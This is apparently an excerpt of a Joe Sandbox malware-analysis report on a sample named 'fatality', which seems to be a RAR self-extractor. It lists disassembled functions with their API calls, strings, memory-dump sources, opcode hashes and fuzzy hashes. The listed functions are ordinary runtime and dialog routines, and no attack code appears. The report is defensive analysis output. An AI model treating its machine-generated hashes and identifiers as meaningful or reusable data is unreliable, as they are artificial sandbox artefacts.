                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                    • API String ID: 176396367-3568243669
                                                                    • Opcode ID: b349088a46b1517e260081173f7b0bd982ca1f0e5038c2eb382a9bde07a673bd
                                                                    • Instruction ID: 964c75f78bf4e8ff619c8560fa5a2e3e00cf229cd50ea9c804e17a4437bd4544
                                                                    • Opcode Fuzzy Hash: b349088a46b1517e260081173f7b0bd982ca1f0e5038c2eb382a9bde07a673bd
                                                                    • Instruction Fuzzy Hash: 4151D566E4132A95DB309A259C31776F3E4DFA1750F6EC42AFBC19B2C0FB658C818271
                                                                    Function 00E02900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E02937
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E0293F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E029C8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E029F3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E02A48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
                                                                    • Instruction ID: f7e1a960f837755cfcb0f6258cc74b065782aea1981d7907611550ba4bf8d7c5
                                                                    • Opcode Fuzzy Hash: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
                                                                    • Instruction Fuzzy Hash: 1041D434A00208AFCF14DF68C889ADEBBF5AF84328F149159E9157B3D2D7319A85CB90
                                                                    Function 00DF9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000000), ref: 00DF9EEE
                                                                    • GetWindowRect.USER32(?,00000000), ref: 00DF9F44
                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00DF9FDB
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00DF9FE3
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00DF9FF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$RectText
                                                                    • String ID: RarHtmlClassName
                                                                    • API String ID: 3937224194-1658105358
                                                                    • Opcode ID: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
                                                                    • Instruction ID: 95836e03847abb1ced75751c69a5ef756c4a3c8135dad1405ba5436215ac3191
                                                                    • Opcode Fuzzy Hash: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
                                                                    • Instruction Fuzzy Hash: C1410271405314AFCB215F75EC48F2BBBA8FF48301F098558FA4AA9156CB30E94ACB71
                                                                    Function 00DF9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                    • API String ID: 176396367-3743748572
                                                                    • Opcode ID: a0d926bc4958fdbc2c3ac799a18a8658d3a41d83ada143b0197522e33c2f7805
                                                                    • Instruction ID: 7564487e82f5bd1a5ee976a5118c0f433fd1b534e5bff1fb2a4af18ebfac960a
                                                                    • Opcode Fuzzy Hash: a0d926bc4958fdbc2c3ac799a18a8658d3a41d83ada143b0197522e33c2f7805
                                                                    • Instruction Fuzzy Hash: DA319072E4434956D630AB549C12B76F3E4EB90320F55C41FF682572C0FBA1ADD183B1
                                                                    Function 00E0C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E0C868: _free.LIBCMT ref: 00E0C891
                                                                    • _free.LIBCMT ref: 00E0C8F2
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E0C8FD
                                                                    • _free.LIBCMT ref: 00E0C908
                                                                    • _free.LIBCMT ref: 00E0C95C
                                                                    • _free.LIBCMT ref: 00E0C967
                                                                    • _free.LIBCMT ref: 00E0C972
                                                                    • _free.LIBCMT ref: 00E0C97D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 90a536f42c5fb1171bced7071daeac01f4ec5bd236f9beb4dbb4f36b20ef5980
                                                                    • Instruction ID: 8e10f35ed3343a3394b9c16a458f6938fdc32005fe27ed166d80cbc177edf3cf
                                                                    • Opcode Fuzzy Hash: 90a536f42c5fb1171bced7071daeac01f4ec5bd236f9beb4dbb4f36b20ef5980
                                                                    • Instruction Fuzzy Hash: B0114F71590B06AAE520B7B1DC07FCB7BEC9F00B00F509E15F2DD760D2DA65B5858760
                                                                    Function 00DEC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                      • Part of subcall function 00DEB92D: _wcsrchr.LIBVCRUNTIME ref: 00DEB944
                                                                    • _wcslen.LIBCMT ref: 00DEC197
                                                                    • _wcslen.LIBCMT ref: 00DEC1DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcsrchr
                                                                    • String ID: .exe$.rar$.sfx
                                                                    • API String ID: 3513545583-31770016
                                                                    • Opcode ID: 7d8a0dc6f26e58f5a29188198f705665e3d2fba03db8194481d18abec6a045dd
                                                                    • Instruction ID: 6969a285bfbd6e95321885b5a49da3eac966515b6be1369c0f2014822573a4c5
                                                                    • Opcode Fuzzy Hash: 7d8a0dc6f26e58f5a29188198f705665e3d2fba03db8194481d18abec6a045dd
                                                                    • Instruction Fuzzy Hash: 9D415B225203D595C731BF359802A7BB7A8EF41754F18690EFAC16B182E7509D83C375
                                                                    Function 00DFCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DEB690: _wcslen.LIBCMT ref: 00DEB696
                                                                    • _swprintf.LIBCMT ref: 00DFCED1
                                                                    • SetDlgItemTextW.USER32(?,00000066,00E2946A), ref: 00DFCEF1
                                                                    • _wcschr.LIBVCRUNTIME ref: 00DFCF22
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFCFFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DialogItemText_swprintf_wcschr_wcslen
                                                                    • String ID: %s%s%u
                                                                    • API String ID: 1599705190-1360425832
                                                                    • Opcode ID: 958208e5eba2fec0fb0b86beff1b48a57ee9c8b1fd3f3a83b8795d25bec0699b
                                                                    • Instruction ID: a3981e7f37d99b381d11e1031e39fba3daae08580ab71986bc526b902fee96d9
                                                                    • Opcode Fuzzy Hash: 958208e5eba2fec0fb0b86beff1b48a57ee9c8b1fd3f3a83b8795d25bec0699b
                                                                    • Instruction Fuzzy Hash: F84181B190025DAADF21AB61DC45AFA77FDEF05300F45C0A6FB09E7041EA719A858F71
                                                                    Function 00DFCD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcschr.LIBVCRUNTIME ref: 00DFCD84
                                                                      • Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcschr
                                                                    • String ID: <$HIDE$MAX$MIN
                                                                    • API String ID: 2691759472-3358265660
                                                                    • Opcode ID: 390837f784861457f3720f923df42f2b6e6323e355186218830afb9acb657b1d
                                                                    • Instruction ID: 6fcd3ce8c3bc9c61f747266d53ed69ea6e001441972a039d98b2e17a3ad8021e
                                                                    • Opcode Fuzzy Hash: 390837f784861457f3720f923df42f2b6e6323e355186218830afb9acb657b1d
                                                                    • Instruction Fuzzy Hash: 4A316B7290020DAADB25DB64CC41AFEB3BDEF14350F45C166FA05E7180EBB09A848FB1
                                                                    Function 00DFB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFB2BE
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00DFB2D6
                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00DFB304
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: GETPASSWORD1$xz
                                                                    • API String ID: 445417207-3234807970
                                                                    • Opcode ID: d60bb1ff03acfda105061cd12247bfee8a877c98edcc3bd34604d86de1b31c86
                                                                    • Instruction ID: ecd3385cfc78f0773eb5168d62d89c0231cb6f27448aded9553955cc06ae27fd
                                                                    • Opcode Fuzzy Hash: d60bb1ff03acfda105061cd12247bfee8a877c98edcc3bd34604d86de1b31c86
                                                                    • Instruction Fuzzy Hash: 7C11E532A40118BADB219AB5DC49FFE376CEB5A760F158022FB85B2080C7A0D9459771
                                                                    Function 00DEB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcschr$_swprintf
                                                                    • String ID: %c:\
                                                                    • API String ID: 437864020-3142399695
                                                                    • Opcode ID: 35c392ca7cbeddb5cb78bfd73e57b347b065669a2e2465acee47472c50901e83
                                                                    • Instruction ID: 26bdad5f6e687fa88df9cb87996f7f3c613ea70e07d80d32f716bf5ca4a53e06
                                                                    • Opcode Fuzzy Hash: 35c392ca7cbeddb5cb78bfd73e57b347b065669a2e2465acee47472c50901e83
                                                                    • Instruction Fuzzy Hash: BB01456310035169DA317B768C46D7BA7ECEE81370B54541FF584E2082EB20E88082B1
                                                                    Function 00DFB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadBitmapW.USER32(00000065), ref: 00DFB6ED
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFB712
                                                                    • DeleteObject.GDI32(00000000), ref: 00DFB744
                                                                    • DeleteObject.GDI32(00000000), ref: 00DFB767
                                                                      • Part of subcall function 00DFA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Delete$BitmapCreateGlobalLoadStream
                                                                    • String ID: ]
                                                                    • API String ID: 3658976889-3352871620
                                                                    • Opcode ID: 4c65e8ee8e24ef2bc39f77f46b451199846aead58d6f5971ed73a831e8cc223b
                                                                    • Instruction ID: ab34aa98d6efad3b99480e65fd6e3f78562b7c91a22fb97177597a38228de6da
                                                                    • Opcode Fuzzy Hash: 4c65e8ee8e24ef2bc39f77f46b451199846aead58d6f5971ed73a831e8cc223b
                                                                    • Instruction Fuzzy Hash: AB012676500619ABC71277789C09A7F7AB9DFC1762F1F8112FB04B7291DF618D0A4271
                                                                    Function 00DFD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFD64B
                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DFD661
                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFD675
                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00DFD684
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: RENAMEDLG
                                                                    • API String ID: 445417207-3299779563
                                                                    • Opcode ID: b818a33ddd86516d5ad9b6429b58a53696ca369c1a825d4e566d064eacaeed6b
                                                                    • Instruction ID: 5ab2b2ae6b242c13a9f47620680e7b7da916b555bc9b777d7c6d0c64824cc0f3
                                                                    • Opcode Fuzzy Hash: b818a33ddd86516d5ad9b6429b58a53696ca369c1a825d4e566d064eacaeed6b
